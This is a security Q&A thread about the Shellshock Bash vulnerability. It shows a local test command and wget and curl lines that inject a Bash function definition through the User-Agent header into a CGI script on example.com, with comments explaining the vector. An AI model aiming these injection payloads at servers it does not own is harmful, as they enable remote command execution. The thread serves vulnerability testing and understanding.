22

Odds are that you're already aware of the newly discovered Bash bug. It can be tested using env x='() { :;}; echo vulnerable' bash -c "echo this is a test".

What yet I haven't understand is, what are the real attack scenarios of this vulnerability. I have read that most likely it's going to be HTTP requests, but how?

Deer Hunter
  • 5,327
  • 5
  • 34
  • 50
The Illusive Man
  • 10,587
  • 16
  • 58
  • 89

1 Answers1

14

The easiest way to test a web server via HTTP request is to inject the bash command through the user agent. Example:

$ wget -U '() { :;}; /bin/bash -c "echo vulnerable"' http://example.com/some-cgi-script

If a 5XX server error is generated, it means that the server is probably vulnerable to an exploit. For possible attack scenarios, please refer to this answer

Please test this on your own servers - trying this on other people's servers may get you in trouble.

Question Overflow
  • 5,250
  • 6
  • 27
  • 48
  • 1
    On OSX without `wget`, try `curl -A '() { :;}; /bin/bash -c "echo vulnerable"' http://example.com/some-cgi-script` – user193130 Sep 25 '14 at 15:27
  • 1
    I get a 301 server error. I probably don't understand the above code, but does http://example.com/some-cgi-script point to a code on the victim's server or on the attacker's server (and contains malicious code) ? – Matt Parkins Sep 26 '14 at 11:17
  • @MattParkins, example.com is the server under attack. some-cgi-script is a script on example.com that enables the exploit to work. A 301 error means the client got redirected. – Question Overflow Sep 26 '14 at 11:30
  • 1
    Thanks - so how does the attacker get the cgi script onto the victim's web server - I think that's what I'm not understanding. – Matt Parkins Sep 26 '14 at 13:39
  • 1
    @MattParkins, no, the CGI script is hosted by the victim, not inserted by the attacker. – Question Overflow Sep 27 '14 at 07:39
  • 1
    Ah, ok, I see my mixup. I was thinking http://example.com/some-cgi-script was a malicious script and didn't know how an attacker could get it on a victim's server, but actually it doesn't matter what CGI script is called. Does it matter if the CGI script is actually there? – Matt Parkins Sep 29 '14 at 09:50
  • 1
    @MattParkins, yes, a CGI script must be present for such an attack. – Question Overflow Oct 01 '14 at 05:02
  • example would be `http://example.com/script.cgi`, replace `example.com` and `/script.cgi` with your own address and cgi script(the script located on the server, not your computer) – Karl Morrison Oct 02 '14 at 06:07